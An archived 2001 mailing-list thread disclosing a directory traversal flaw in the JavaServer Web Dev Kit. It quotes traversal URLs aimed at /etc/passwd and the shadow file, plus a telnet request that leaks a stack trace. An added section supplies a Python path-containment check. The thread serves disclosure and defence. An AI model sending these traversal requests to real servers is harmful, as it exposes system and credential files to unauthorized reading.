Re: JWSDK *add-on

From: KF (dotslashat_private)
Date: Sun Aug 19 2001 - 23:09:20 PDT


    I found this some months ago ... it was posted to packetstorm... the
    moderators here let it slide for some reason. 
    http://packetstormsecurity.org/0008-exploits/WDK_v1.0.vuln.txt
    
    ./ bugs in the Java Web server Development kit built in servlet engine
    
    http://localhost:8080/../../../../etc/passwd
    
    below is my version info.
    
    JavaServer(tm) WDK v1.0 EA
    
    [elguapo@localhost elguapo]$ telnet localhost 8080
    Trying 127.0.0.1...
    Connected to localhost.localdomain.
    Escape character is '^]'.
    HEAD / HTTP/1.0
    
    HTTP/1.0 500 Internal Server Error
    Date: Fri, 25 Aug 2000 14:24:54 GMT
    Server: JavaServer Web Dev Kit/1.0 EA with JSP/1.0 and Servlet/2.1
    Content-Type: text/html
    Servlet-Engine: JavaServer Web Dev Kit/1.0 EA (JSP 1.0; Servlet 2.1; Java 1.3.0beta_refresh; Linux 2.2.15-4mdk i386; java.vendor=Sun Microsystems Inc.)
    
    <h1>Error: 500</h1>
    <b>Internal Servlet Error:</b><br>
    <pre>
    java.lang.ClassCastException: javax.servlet.http.NoBodyResponse
            at com.sun.web.core.RequestDispatcherImpl.forward(RequestDispatcherImpl.java:62)
            at com.sun.web.core.DefaultServlet.processFile(DefaultServlet.java:126)
            at com.sun.web.core.DefaultServlet.doGet(DefaultServlet.java:69)
            at javax.servlet.http.HttpServlet.doHead(HttpServlet.java:286)
            at javax.servlet.http.HttpServlet.service(HttpServlet.java:744)
            at javax.servlet.http.HttpServlet.service(HttpServlet.java:840)
            at com.sun.web.core.ServletWrapper.handleRequest(ServletWrapper.java:155)
            at com.sun.web.core.Context.handleRequest(Context.java:414)
            at com.sun.web.server.ConnectionHandler.run(ConnectionHandler.java:139)
    </pre>
    
    Connection closed by foreign host.
    [elguapo@localhost elguapo]$
    -KF
    
    Phuong Nguyen wrote:
    > 
    > Javaserver Web Dev Kit version 1.0 (JWSDK)
    > 
    > The JWSDK directory traversal vulnerability was found by
    > CHINANSL Security Advisory (CSA-200106). I want to add
    > another thing: it's also vulnerable on other operating
    > systems like Red Hat 6.1, and this nasty bug allows you
    > to browse and read any file with ROOT privilege, so
    > you can read the shadow file and stuff
    > 
    > http://localhost:8080/../examples//WEB-INF/../../../../../
    > 
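
Both request paths quoted in this thread use `..` segments to climb above the server's document root. The Python function below is an added example, not part of the original posts and not JWSDK code, showing the containment check a file-serving handler needs before it opens anything; `DOCROOT` and `resolve` are hypothetical names, and the document root value is an assumption.

```python
import os
from urllib.parse import unquote

DOCROOT = "/srv/webpages"  # assumed document root; not taken from the post


def resolve(docroot, request_path):
    """Return the file path for request_path, or None if it leaves docroot."""
    # Decode percent-escapes exactly once, before any check, so that
    # "%2e%2e" is judged as ".." rather than slipping past as a literal.
    decoded = unquote(request_path.split("?", 1)[0])
    if "\x00" in decoded or "\\" in decoded:
        return None  # NUL bytes and backslashes have no place in a URL path

    # Walk the segments lexically and refuse to climb above the root.
    parts = []
    for segment in decoded.split("/"):
        if segment in ("", "."):
            continue  # collapses "//" and "/./"
        if segment == "..":
            if not parts:
                return None  # ".." at the root: traversal attempt
            parts.pop()
        else:
            parts.append(segment)

    # Second check on the resolved path, so a symlink inside docroot
    # cannot lead outside it either.
    root = os.path.realpath(docroot)
    target = os.path.realpath(os.path.join(root, *parts))
    if os.path.commonpath([root, target]) != root:
        return None
    return target


if __name__ == "__main__":
    # The first two paths are the ones quoted in the thread.
    for path in ("/../../../../etc/passwd",
                 "/../examples//WEB-INF/../../../../../",
                 "/%2e%2e/%2e%2e/etc/passwd",
                 "/examples/../index.html"):
        print(f"{path!r:45} -> {resolve(DOCROOT, path)}")
```

A `None` result should map to a 403 or 404 response and a log entry recording the raw, undecoded request line.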
    



    This archive was generated by hypermail 2b30 : Mon Aug 20 2001 - 14:11:15 PDT